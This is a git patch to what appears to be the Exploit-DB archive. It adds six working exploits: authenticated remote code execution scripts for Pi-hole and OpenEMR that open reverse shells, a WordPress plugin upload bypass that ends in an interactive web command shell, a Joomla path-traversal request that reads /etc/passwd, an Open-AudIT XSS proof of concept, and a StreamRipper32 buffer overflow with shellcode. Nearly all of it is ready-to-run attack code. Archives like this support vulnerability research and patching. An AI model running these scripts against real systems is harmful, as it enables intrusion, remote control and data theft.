From e031da05b03df0edb1b44fc7b6ae704b0c0b4b14 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 27 May 2020 05:02:09 +0000 Subject: [PATCH] DB: 2020-05-27 7 changes to exploits/shellcodes StreamRipper32 2.6 - Buffer Overflow (PoC) OpenEMR 5.0.1 - Remote Code Execution Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated) Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated) Pi-hole 4.4.0 - Remote Code Execution (Authenticated) WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution --- exploits/linux/webapps/48519.py | 254 ++++++++++++++++++++++++++++++++ exploits/php/webapps/40300.py | 2 +- exploits/php/webapps/48515.py | 187 +++++++++++++++++++++++ exploits/php/webapps/48516.txt | 12 ++ exploits/php/webapps/48518.txt | 103 +++++++++++++ exploits/php/webapps/48520.txt | 123 ++++++++++++++++ exploits/windows/local/48517.py | 39 +++++ files_exploits.csv | 6 + 8 files changed, 725 insertions(+), 1 deletion(-) create mode 100755 exploits/linux/webapps/48519.py create mode 100755 exploits/php/webapps/48515.py create mode 100644 exploits/php/webapps/48516.txt create mode 100644 exploits/php/webapps/48518.txt create mode 100644 exploits/php/webapps/48520.txt create mode 100755 exploits/windows/local/48517.py diff --git a/exploits/linux/webapps/48519.py b/exploits/linux/webapps/48519.py new file mode 100755 index 000000000..b401230b1 --- /dev/null +++ b/exploits/linux/webapps/48519.py @@ -0,0 +1,254 @@ +# Exploit Title: Pi-hole 4.4.0 - Remote Code Execution (Authenticated) +# Date: 2020-05-22 +# Exploit Author: Photubias +# Vendor Advisory: [1] https://github.com/pi-hole/AdminLTE +# Version: Pi-hole <=4.4.0 + Web <=4.3.3 +# Tested on: Pi-hole v4.4.0-g9e49077, Web v4.3.3,v4.3.2-1-g4f824be, FTL v5.0 (on Debian 10) +# CVE: CVE-2020-11108 + +#!/usr/bin/env python3 +''' + Copyright 2020 Photubias(c) + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + Based (and improved on): https://github.com/Frichetten/CVE-2020-11108-PoC/blob/master/cve-2020-11108-rce.py + + File name CVE-2020-11108.py + written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be + + ## Vulnerable setup instructions (from clean Debian 10-Buster): + > apt update && apt install -y curl + > curl -sSL https://install.pi-hole.net | bash + > pihole checkout web release/v4.3.3 + > cd /etc/.pihole/ && git checkout v4.4 + > pihole -r ## Select reconfigure + + This is a native implementation without requirements, written in Python 3. + Works equally well on Windows as Linux (as MacOS, probably ;-) + + Features: + * Does a reliable check before exploitation (not based on version numbers) + * Performs normal RCE without Privilege Escalation (wich is more trust worthy) + * Asks before running Root RCE (as this overwrites certain files) + * Performs a cleanup in all cases (success / failure) +''' + +import urllib.request, ssl, http.cookiejar, sys, string, random +import socket, _thread, time + +## Default vars; change at will +_sURL = '192.168.50.130' +_sPASSWORD = '6DS4QtW5' +_iTIMEOUT = 5 +_sLOCALIP = '192.168.50.1' +_sFILENAME = 'fun2.php' +_sLOCALNCPORT = '4444' ## Make sure to set up a listener on this port first + +## Ignore unsigned certs +ssl._create_default_https_context = ssl._create_unverified_context + +## Keep track of cookies between requests +cj = http.cookiejar.CookieJar() +oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) + +def randomString(iStringLength=8): + sLetters = string.ascii_lowercase + return ''.join(random.choice(sLetters) for i in range(iStringLength)) + +def postData(sURL, lData, bEncode = True): + try: + if bEncode: oData = urllib.parse.urlencode(lData).encode() + else: oData = str(lData).encode() + oRequest = urllib.request.Request(url = sURL, data = oData) + return oOpener.open(oRequest, timeout = _iTIMEOUT) + except: + print('----- ERROR, site down?') + sys.exit(1) + +def getEndpoint(): + if not _sURL[:4].lower() == 'http': sURL = 'http://' + _sURL + else: sURL = _sURL + if not sURL[:-1] == '/': sURL += '/' + if not '/admin' in sURL: sURL += 'admin' + try: + oRequest = urllib.request.Request(sURL) + oResponse = oOpener.open(oRequest, timeout = _iTIMEOUT) + except: + print('[-] Error: ' + sURL + ' not responding') + exit(1) + if oResponse.code == 200: + print('[+] Vulnerable URL is ' + sURL) + return sURL + else: + print('[-] Error: ' + sURL + ' does not exist?') + exit(1) + +def startListener(sPayload, iSockTimeout): + ## Listener must always be on port 80, does not work otherwise + oSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + print('[!] Binding to '+_sLOCALIP+':80') + oSock.bind((_sLOCALIP,80)) + oSock.settimeout(iSockTimeout) + oSock.listen() + + while True: + try: oConn,sAddr= oSock.accept() + except: break + print('[+] Yes, we have an incoming connection from '+str(sAddr[0])) + oConn.sendall(sPayload.encode()) + oConn.close() + break + oSock.close() + print('[!] Closing Listener') + +def doLogin(sURL, sPassword): + sPath = '/index.php?login' + lData = {'pw':sPassword} + oResponse = postData(sURL + sPath, lData) + sResult = oResponse.read().decode(errors='ignore') + if 'Wrong password' in sResult: + print('Wrong password') + sys.exit(1) + return True + +def getToken(sURL): + sPath = '/settings.php?tab=blocklists' + oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT) + sResult = oResponse.read().decode(errors='ignore') + if 'id=\'token\'' in sResult: + return sResult.split('id=\'token\' hidden>')[1].split('<')[0] + else: + print('[-] Error in getting a token') + sys.exit(1) + +def createBackdoor(sURL, sFilename): + sToken = getToken(sURL) + sPath = '/settings.php?tab=blocklists' + lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o ' + sFilename + ' -d "', 'field':'adlists', 'token':sToken, 'submit':'save'} + #lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o fun.php -d "', 'field':'adlists', 'token':sToken, 'submit':'saveupdate'} + oResponse = postData(sURL + sPath, lData) + if oResponse.code == 200: + sResult = oResponse.read().decode(errors='ignore') + arrBlocklists = sResult.split('target="_new"') + sID = str(len(arrBlocklists)-2) + print('[+] Creation success, ID is '+sID+'!') + return sID + else: + return '' + + +def doUpdate(sURL): + sPath = '/scripts/pi-hole/php/gravity.sh.php' + try: + oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT) + if oResponse.code == 200: print('[+] Update succeeded.') + return True + except: + print('[-] Error; callback failed, maybe a firewall issue?') + return False + +def callExploit(sURL, sFilename = _sFILENAME): + sPath = '/scripts/pi-hole/php/' + sFilename + print('[+] Calling ' + sURL + sPath) + try: + oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT) + if oResponse.code == 200: print('[+] Calling exploit succeeded.') + print(oResponse.read().decode(errors='ignore')) + except: + pass + +def removeEntry(sURL, sID): + print('[+] Cleaning up now.') + sToken = getToken(sURL) + sPath = '/settings.php?tab=blocklists' + lData = {'adlist-del-'+sID:'on', 'newuserlists':'', 'field':'adlists', 'token':sToken, 'submit':'save'} + oResponse = postData(sURL + sPath, lData) + if oResponse.code == 200: + print('[+] Remove success') + +def main(): + global _sURL, _sPASSWORD, _iTIMEOUT, _sLOCALIP, _sFILENAME, _sLOCALNCPORT + if len(sys.argv) == 1: + print('[!] No arguments found: python3 CVE-2020-11108.py ') + print(' Example: ./CVE-2020-11108.py 192.168.50.130 192.168.50.1 6DS4QtW5') + print(' But for now, I will ask questions') + sAnswer = input('[?] Please enter the IP address for Pi-Hole ([' + _sURL + ']): ') + if not sAnswer == '': _sURL = sAnswer + sAnswer = input('[?] Please enter the your (reachable) IP address to launch listeners ([' + _sLOCALIP + ']): ') + if not sAnswer == '': _sLOCALIP = sAnswer + sAnswer = input('[?] Please enter the password for Pi-Hole ([' + _sPASSWORD + ']): ') + if not sAnswer == '': _sPASSWORD = sAnswer + else: + _sURL = sys.argv[1] + _sLOCALIP = sys.argv[2] + _sPASSWORD = sys.argv[3] + + ## MAIN + sURL = getEndpoint() ## Will also set the initial SessionID + doLogin(sURL, _sPASSWORD) + + ## Creating backdoor (1) ## the old 'fun.php' + sFilename = randomString() + '.php' + sID = createBackdoor(sURL, sFilename) + + ## Launch first payload listener and send 200 OK + _thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,)) + if doUpdate(sURL): + print('[+] This system is vulnerable!') + + ## Question Time + sAnswer = input('Want to continue with exploitation? (Or just run cleanup)? [y/N]: ') + if not sAnswer.lower() == 'y': + removeEntry(sURL, sID) + sys.exit(0) + sAnswer = input('Want root access? (Breaks the application!!) [y/N]: ') + if sAnswer.lower() == 'y': bRoot = True + else: bRoot = False + + if bRoot: + print('[!] Allright, going for the root shell') + ## Launch payload listener and send root shell + _sPayload = '''''' + _thread.start_new_thread(startListener,(_sPayload,5,)) + doUpdate(sURL) + + ## Creating backdoor (2), overwriting teleporter.php + sID2 = createBackdoor(sURL, 'teleporter.php') + + ## Launch payload listener for a new 200 OK + _thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,)) + doUpdate(sURL) + + input('Ok, make sure to have a netcat listener on "' + _sLOCALIP + ':' + _sLOCALNCPORT + '" ("nc -lnvp ' + _sLOCALNCPORT + '") and press enter to continue...') + + ## Launch shell payload listener: + _sPayload = ''' + ''' %(_sLOCALIP, _sLOCALNCPORT) + #_sPayload = '''''' ## this works perfectly, but the URL is authenticated + _thread.start_new_thread(startListener,(_sPayload,5,)) + doUpdate(sURL) + + ## Launching the payload, will create new PHP file + callExploit(sURL, sFilename) + + ## Remove entry again + if bRoot: removeEntry(sURL, sID2) + removeEntry(sURL, sID) + + if len(sys.argv) == 1: input('[+] All done, press enter to exit') + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/40300.py b/exploits/php/webapps/40300.py index 2b3904dca..9997cd4cc 100755 --- a/exploits/php/webapps/40300.py +++ b/exploits/php/webapps/40300.py @@ -122,4 +122,4 @@ for x in range(0, 300): sys.exit(0) print "Sorry, I did not find anything" -''' +''' \ No newline at end of file diff --git a/exploits/php/webapps/48515.py b/exploits/php/webapps/48515.py new file mode 100755 index 000000000..7725a1173 --- /dev/null +++ b/exploits/php/webapps/48515.py @@ -0,0 +1,187 @@ +# Title: OpenEMR 5.0.1 - Remote Code Execution +# Exploit Author: Musyoka Ian +# Date: 2020-05-25 +# Title: OpenEMR < 5.0.1 - Remote Code Execution +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz +# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile +# Version: < 5.0.1 (Patch 4) +# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3 +# References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69 + +# openemr_exploit.py + +#!/usr/bin/env python2 +# -*- coding: utf-8 -*- + +import requests +import time + +auth = "[+] Authentication with credentials provided please be patient" +upload = "[+] Uploading a payload it will take a minute" +netcat = "[+] You should be getting a shell" +s = requests.Session() +payload = {'site': 'default', 'mode' : 'save', 'docid' : 'shell.php', 'content' : """ array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + 2 => array("pipe", "w") // stderr is a pipe that the child will write to +); + +$process = proc_open($shell, $descriptorspec, $pipes); + +if (!is_resource($process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} + +// Set everything to non-blocking +// Reason: Occsionally reads will block, even though stream_select tells us they won't +stream_set_blocking($pipes[0], 0); +stream_set_blocking($pipes[1], 0); +stream_set_blocking($pipes[2], 0); +stream_set_blocking($sock, 0); + +printit("Successfully opened reverse shell to $ip:$port"); + +while (1) { + // Check for end of TCP connection + if (feof($sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + + // Check for end of STDOUT + if (feof($pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + + // Wait until a command is end down $sock, or some + // command output is available on STDOUT or STDERR + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + + // If we can read from the TCP socket, send + // data to process's STDIN + if (in_array($sock, $read_a)) { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + + // If we can read from the process's STDOUT + // send data down tcp connection + if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + + // If we can read from the process's STDERR + // send data down tcp connection + if (in_array($pipes[2], $read_a)) { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } +} + +fclose($sock); +fclose($pipes[0]); +fclose($pipes[1]); +fclose($pipes[2]); +proc_close($process); + +// Like print, but does nothing if we've daemonised ourself +// (I can't figure out how to redirect STDOUT like a proper daemon) +function printit ($string) { + if (!$daemon) { + print "$string\n"; + } +} + +?> """} +print (auth) +url = "http://localhost/openemr/interface/main/main_screen.php?auth=login&site=default" +data= { + 'new_login_session_management' : '1', + 'authProvider' : 'Default', + 'authUser' : 'admin', # change this to the the appropriate username + 'clearPass' : 'password123', # change this to the appropriate password + 'languageChoice' : '1', + } + +response = s.post(url, data=data,).text +time.sleep(2) +print (upload) +time.sleep(2) +resp = s.post("http://localhost/openemr/portal/import_template.php?site=default", data = payload) +time.sleep(2) +print (netcat) +rev_shell = s.get("http://localhost/openemr/portal/shell.php") +print (rev_shell.text) \ No newline at end of file diff --git a/exploits/php/webapps/48516.txt b/exploits/php/webapps/48516.txt new file mode 100644 index 000000000..166566f0c --- /dev/null +++ b/exploits/php/webapps/48516.txt @@ -0,0 +1,12 @@ +# Exploit Title: Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated) +# Date: 2020-04-26 +# Exploit Author: Kamaljeet Kumar +# Vendor Homepage: https://opmantek.com/network-discovery-inventory-software/ +# Software Link: https://www.open-audit.org/downloads.php +# Version: 3.3.0 +# CVE : CVE-2020-12261 +# POC: +Step 1: Login to Open-Audit +Step 2: Go to "http://192.168.0.4/open-audit/index.php/search/" and add this "" payload after the search, the URL look like: http://192.168.0.4/open-audit/index.php/search/ + +Then we get the XSS pop up. \ No newline at end of file diff --git a/exploits/php/webapps/48518.txt b/exploits/php/webapps/48518.txt new file mode 100644 index 000000000..5a34b9c79 --- /dev/null +++ b/exploits/php/webapps/48518.txt @@ -0,0 +1,103 @@ +# Exploit Title: Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated) +# Date: 2020-05-10 +# Exploit Author: Mehmet Kelepçe / Gais Cyber Security +# Exploit-Db Author ID: 8763 +# Reference: https://www.xcloner.com/xcloner-news/security-release-available-for-archived-joomla-version/ +# Vendor Homepage: http://www.xcloner.com +# Software Link: https://www.xcloner.com/support/download/ +# Version: 3.5.3 +# Tested on: Kali Linux - Apache2 +-------------------------------------------------------------------------------- +Detail: +-------------------------------------------------------------------------------- +File: administrator/components/com_xcloner-backupandstore/admin.cloner.php --> +------------ +case 'download': + downloadBackup($_REQUEST['file']); + break; +------------- +downloadBackup function's file -> administrator/components/com_xcloner-backupandstore/cloner.functions.php +Vulnerable parameter: file + +downloadBackup function's definition +-------------------------------------------------------------------------------- + function downloadBackup($file) + { + global $_CONFIG; + + $file = realpath($_CONFIG['clonerPath'] . "/$file"); + + //First, see if the file exists + if (!is_file($file)) { + die("404 File $file was not found!"); + } + + //File Info + $len = get_filesize($file); + $filename = basename($file); + $file_extension = strtolower(substr(strrchr($filename, "."), 1)); + + //Setam Content-Type-urile pentru fisierul in cauza + switch ($file_extension) { + default: + $ctype = "application/force-download"; + } + + smartReadFile($file, $filename); + + exit; + } +-------------------------------------------------------------------------------- +and smartReadFile function's definition +-------------------------------------------------------------------------------- +function smartReadFile($location, $filename, $mimeType='application/octet-stream') +{ if(!file_exists($location)) + { header ("HTTP/1.0 404 Not Found"); + return; + } + + $size=filesize($location); + $time=date('r',filemtime($location)); + + $fm=@fopen($location,'r'); +. +. +. +-------------------------------------------------------------------------------- +PoC: +Request: +-------------------------------------------------------------------------------- +GET /joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=download&file=../../../../../../../../etc/passwd HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/joomla/administrator/index.php?option=com_xcloner-backupandrestore&task=view +Connection: close +Cookie: COOKIES +Upgrade-Insecure-Requests: 1 +-------------------------------------------------------------------------------- +Response: +-------------------------------------------------------------------------------- +HTTP/1.0 200 OK +Date: Sun, 10 May 2020 18:12:04 GMT +Server: Apache/2.4.41 (Debian) +Cache-Control: public, must-revalidate, max-age=0 +Pragma: no-cache +Accept-Ranges: bytes +Content-Length: 3347 +Content-Range: bytes 0-3347/3347 +Content-Disposition: inline; filename=passwd +Content-Transfer-Encoding: binary +Last-Modified: Sun, 22 Mar 2020 05:41:35 -0700 +Connection: close +Content-Type: application/octet-stream + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +. +. \ No newline at end of file diff --git a/exploits/php/webapps/48520.txt b/exploits/php/webapps/48520.txt new file mode 100644 index 000000000..5cba6e6af --- /dev/null +++ b/exploits/php/webapps/48520.txt @@ -0,0 +1,123 @@ +# Exploit Title: WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution +# Date: 2020-05-11 +# Exploit Author: Austin Martin +# Google Dork: inurl:wp-content/uploads/wp_dndcf7_uploads/ +# Google Dork: inurl:wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/ +# Vendor Homepage: https://www.codedropz.com/ +# Software Link: https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/ +# Version: 1.3.3.2 +# Tested on: WordPress 5.4.1, PHP 7.41 +# CVE : N/A + +# Notes: +# At time of disclosure, the WordPress page listed this plugin being used by +10,000 applications +# Application was patched by vendor within 24 hours of initial disclosure +# This exploit works bypassing the allowed file types and file type sanitization. If lucky, a PHP file with a reverse shell can be uploaded and accessed + +# Any file types can be added to the "supported_type" parameter +# These uploaded files can be accessed at wp-content/uploads/wp_dndcf7_uploads/ +# Dangerous file types such as php have "_.txt" appended to the end creating a text file +# This can be bypassed by adding '%' to the end of the allowed file type, and the end of the file name +# ex. "php%" for file type and "shell.php%" for filename +# The PHP payload in the POC can be easily modified to gain a reverse shell + +#!/usr/bin/python +import string +import random +import requests +from bs4 import BeautifulSoup +import sys + +payloadurl="" +def RecurseLinks(base,file): + + headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"} + f = requests.get(base, headers=headers) + soup = BeautifulSoup(f.content, "html.parser") + + for root in soup.find_all("a"): + href = root.get("href") + if (href.startswith("/")): + do = "nothing" + elif (href.endswith("/")): + RecurseLinks(base + href, file) + else: + if file in href: + print ("\n[+] File Found --> " + base + href) + global payloadurl + payloadurl = (base+href) + +def main(): + #os.system('cls') + print("WordPress Plugin \'Drag and Drop Multiple File Upload - Contact Form 7\' 1.3.3.2 - Unauthenticated Remote Code Execution") + print("@amartinsec --> Twitter\nCVE:2020-12800\n") + + #Build The Request + #Generate random URL for filename + file = ''.join(random.sample((string.ascii_uppercase + string.digits), 6)) + + urlinput = raw_input("[+] Enter url to the vulnerable WordPress application: ") + + #Finding the nonce used in the Ajax security string + print ("\n[+] Searching for security string nonce") + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'} + homepage = requests.get(urlinput,headers=headers) + homepage = homepage.text + homepage = homepage.split("ajax_nonce\":\"",1)[1] + securitykey = homepage[:10] + print("[+] Found security string --> " + securitykey) + + url = urlinput + "/wp-admin/admin-ajax.php" + + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0", + "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", + "Content-Type": "multipart/form-data; boundary=---------------------------350278735926454076983690555601", + } + data = "-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"supported_type\"\r\n\r\n" \ + "php%\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"size_limit\"\r\n\r\n" \ + "5242880\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n" \ + "dnd_codedropz_upload\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"type" \ + "\"\r\n\r\nclick\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"security\"\r" \ + "\n\r\n" + securitykey +"\r\n-----------------------------350278735926454076983690555601\r\nContent-Disposition: form-data; name=\"upload-file\"; " \ + "filename=\"" + file +".php%\"\r\nContent-Type: text/plain\r\n\r\n" \ + "&1'); ?>" \ + "\r\n-----------------------------350278735926454076983690555601--\r\n" + + print "\n[+] Sending payload to target" + + response = requests.post(url, headers=headers, data=data) + + if "200" in str(response): + print("[+] Looks like a successful file upload!\n") + + + elif "403" in str(response): + print("\nFile Upload Failed") + print("403 in response. Check security string") + sys.exit(1) + + else: + print("File upload failed. Try the manual way with Burp") + sys.exit(1) + + print("[+] Crawling for the uploaded file. This may take a minute...") + print("[+] Searching for " + file + ".php") + + RecurseLinks(urlinput + "/wp-content/uploads/",file) + + if payloadurl == "": + print("Can't find the file on the web server") + print("Try the manual method") + sys.exit(1) + + #If all goes well, we can now send requests for RCE + print("[+] Success\n") + while True: + cmd= raw_input("[+] CMD: ") + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'} + request = requests.get(payloadurl + "?e=" + cmd, headers=headers) + print request.text + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/local/48517.py b/exploits/windows/local/48517.py new file mode 100755 index 000000000..44f781bec --- /dev/null +++ b/exploits/windows/local/48517.py @@ -0,0 +1,39 @@ +# Exploit Title: StreamRipper32 2.6 - Buffer Overflow (PoC) +# Date: 2020-05-14 +# Exploit Author: Andy Bowden +# Tested On: Win10 x64 +# Download Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe +# Vendor Page: http://streamripper.sourceforge.net/ +# Version: 2.6 +# Steps To Reproduce: Double click on "Add" in the"Station/Song Section" and paste the output in "SongPattern" + +#Bad Characters \x00\x0A\x0D +file = open('exploit.txt', 'wb') + +buf = b"" +buf += b"A" * 256 +buf += b"\x47\x23\x30\x74" #74302347 +buf += b"\x90" * 30 + +#calc payload +buf += b"\xdb\xc2\xbd\x72\x07\xda\xa7\xd9\x74\x24\xf4\x58\x29" +buf += b"\xc9\xb1\x31\x83\xe8\xfc\x31\x68\x14\x03\x68\x66\xe5" +buf += b"\x2f\x5b\x6e\x6b\xcf\xa4\x6e\x0c\x59\x41\x5f\x0c\x3d" +buf += b"\x01\xcf\xbc\x35\x47\xe3\x37\x1b\x7c\x70\x35\xb4\x73" +buf += b"\x31\xf0\xe2\xba\xc2\xa9\xd7\xdd\x40\xb0\x0b\x3e\x79" +buf += b"\x7b\x5e\x3f\xbe\x66\x93\x6d\x17\xec\x06\x82\x1c\xb8" +buf += b"\x9a\x29\x6e\x2c\x9b\xce\x26\x4f\x8a\x40\x3d\x16\x0c" +buf += b"\x62\x92\x22\x05\x7c\xf7\x0f\xdf\xf7\xc3\xe4\xde\xd1" +buf += b"\x1a\x04\x4c\x1c\x93\xf7\x8c\x58\x13\xe8\xfa\x90\x60" +buf += b"\x95\xfc\x66\x1b\x41\x88\x7c\xbb\x02\x2a\x59\x3a\xc6" +buf += b"\xad\x2a\x30\xa3\xba\x75\x54\x32\x6e\x0e\x60\xbf\x91" +buf += b"\xc1\xe1\xfb\xb5\xc5\xaa\x58\xd7\x5c\x16\x0e\xe8\xbf" +buf += b"\xf9\xef\x4c\xcb\x17\xfb\xfc\x96\x7d\xfa\x73\xad\x33" +buf += b"\xfc\x8b\xae\x63\x95\xba\x25\xec\xe2\x42\xec\x49\x1c" +buf += b"\x09\xad\xfb\xb5\xd4\x27\xbe\xdb\xe6\x9d\xfc\xe5\x64" +buf += b"\x14\x7c\x12\x74\x5d\x79\x5e\x32\x8d\xf3\xcf\xd7\xb1" +buf += b"\xa0\xf0\xfd\xd1\x27\x63\x9d\x3b\xc2\x03\x04\x44" +buf += b"\x90" * (1000 - len(buf)) + +file.write(buf) +file.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8d75cda34..a751d0aa2 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11082,6 +11082,7 @@ id,file,description,date,author,type,platform,port 48505,exploits/windows/local/48505.txt,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation",2020-05-22,"Matteo Malvica",local,windows, 48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows, 48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows, +48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42742,3 +42743,8 @@ id,file,description,date,author,type,platform,port 48509,exploits/php/webapps/48509.txt,"Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)",2020-05-25,SunCSR,webapps,php, 48511,exploits/php/webapps/48511.txt,"Victor CMS 1.0 - 'add_user' Persistent Cross-Site Scripting",2020-05-25,"Nitya Nand",webapps,php, 48512,exploits/php/webapps/48512.txt,"Online Discussion Forum Site 1.0 - Remote Code Execution",2020-05-25,Enesdex,webapps,php, +48515,exploits/php/webapps/48515.py,"OpenEMR 5.0.1 - Remote Code Execution",2020-05-26,"Musyoka Ian",webapps,php, +48516,exploits/php/webapps/48516.txt,"Open-AudIT 3.3.0 - Reflective Cross-Site Scripting (Authenticated)",2020-05-26,"Kamaljeet Kumar",webapps,php, +48518,exploits/php/webapps/48518.txt,"Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)",2020-05-26,"Mehmet Kelepçe",webapps,php, +48519,exploits/linux/webapps/48519.py,"Pi-hole 4.4.0 - Remote Code Execution (Authenticated)",2020-05-26,Photubias,webapps,linux, +48520,exploits/php/webapps/48520.txt,"WordPress Plugin Drag and Drop File Upload Contact Form 1.3.3.2 - Remote Code Execution",2020-05-26,"Austin Martin",webapps,php,